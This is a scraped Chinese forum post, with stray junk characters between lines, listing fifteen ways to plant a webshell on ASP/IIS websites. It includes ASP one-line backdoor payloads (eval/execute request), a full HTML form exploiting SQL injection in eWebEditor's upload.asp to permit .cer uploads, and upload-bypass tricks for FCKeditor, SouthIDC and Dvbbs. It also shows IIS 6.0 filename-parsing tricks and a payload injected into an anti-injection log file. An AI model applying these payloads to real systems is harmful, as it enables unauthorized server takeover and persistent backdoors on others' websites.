 
- 帖子
- 228
- 积分
- 645
- 威望
- 810
- 金钱
- 1192
- 在线时间
- 63 小时
|
1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式
; F. P9 G3 O' i6 H3 g0 D1 r: L4 `
2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试<%eval request("value")%>来突破,例如config.asp
8 J6 \) G1 T- K& j& {) c/ D
# k$ ]6 U2 G- |0 _" i/ V+ M3.上传漏洞:
+ E/ X# E3 C0 m7 x4 X( @
+ v3 G" M. W# I F. U4 u0 e9 \动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00
8 \3 _' q7 u a6 g5 n, L' }% s" l2 z* a% o. ^7 o
逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件
' X2 l3 n: C( P$ E
6 L a, g; ~ e' K3 D雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp$ M$ H3 S$ | a0 V
然后在上传文件里面填要传的图片格式的ASP木马- w/ l" \& u9 E
就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp0 U* @% ?- ~: D! M5 |% f' P
4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传
* z7 K1 ~1 P$ K% N$ q
5 D' A* j$ l/ j( n j<html>
% e1 ?, S) g# {+ |<head>
# ]! }8 q- a- o+ D<title>ewebeditor upload.asp上传利用</title>
7 H- Y% \& h6 {; U, ~</head>$ P/ w3 |1 n- S. v7 U. J; f
<body>
# J4 Q% h+ D2 p0 t% a6 @1 L6 C<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">) X: a/ z5 ~+ w7 p
<input type=file name=uploadfile size=100><br><br>( _/ H# z2 l( T6 B
<input type=submit value=Fuck>9 x5 l1 D2 ?% Q
</form>
. D* q) `+ p4 U( \0 q7 Y& m3 `</body>% J. c4 k. z# }
</form>
0 E) V8 K1 A6 d3 N y</html>9 K! n9 `7 e* K( m1 b# B
; m5 E5 ~1 T0 c7 e, v5 v
2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问
0 O0 X1 H6 y \- V" s' X% _5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp1 p5 r5 j1 e* w0 X" W/ A) b1 }; m
O8 U2 m$ ^' t3 \7 O
利用windows2003解析。建立zjq.asp的文件夹
) Y7 n- m+ l9 X9 Q# S5 |
: K; p, }! i m! M8 i _; o0 B6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型' g% s4 [- v, y) y+ ?
/ Y$ W- ]* Y: _# B8 x/ B7.cuteeditor:类似ewebeditor8 ]0 ?0 f: {4 H+ h3 e$ {
4 k' `/ c: b# l. f7 _& e F# j8.htmleditor:同上
9 D, |, T d4 ?5 }2 A7 B% ]. [- D- {5 o( t
9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破
1 D0 Z$ F- N1 s! O; x) a9 v" ]# Z& S, i, w
<%execute request("value")%><%'<% loop <%:%>
- D1 e4 E& W8 v) L% g* E$ C2 t# B, b1 _
<%'<% loop <%:%><%execute request("value")%>0 g9 p. F. G; N
; h% f7 O. N- q' l" h* o1 p2 P& U<%execute request("value")'<% loop <%:%>% S+ E4 H) U! W
9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞
2 b6 k" A+ p' Y8 T' P5 c
$ i: ^7 g$ D: M2 w! S' v10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞
% D/ R* H" `6 n
1 `4 a" E' }8 }. u11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3
$ q; [" l I$ c5 s
( \" W& ] ]0 f m6 F9 |8 D解析漏洞得到webshell
7 D( A7 ?* F# w2 \$ G( p0 p
p( E4 s1 k' g% U5 `# F12.mssql差异备份,日志备份,前提需知道web路径
5 a* [6 u8 Y7 f2 j R
) O5 b: [6 x; b* `7 r9 k" `13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell
4 s; C$ E/ ]* l
7 ]* V( U9 Y' a$ E* W% l1 n14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell) `- u& I5 W5 d( W4 D- ?
5 _$ f1 c( Y6 ^/ ^15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可
* U6 z6 s$ ^1 C7 |' U+ W$ h' g5 C- N3 N7 O5 e8 u' k# @ R$ `
以上只是本人的一些拙见,并不完善,以后想到了再继续添加6 I6 z" }/ y: H6 i* A( ~' M
不是我原创。我的朋友,飞鸟游鱼原创的 |
-
2
评分人数
-
|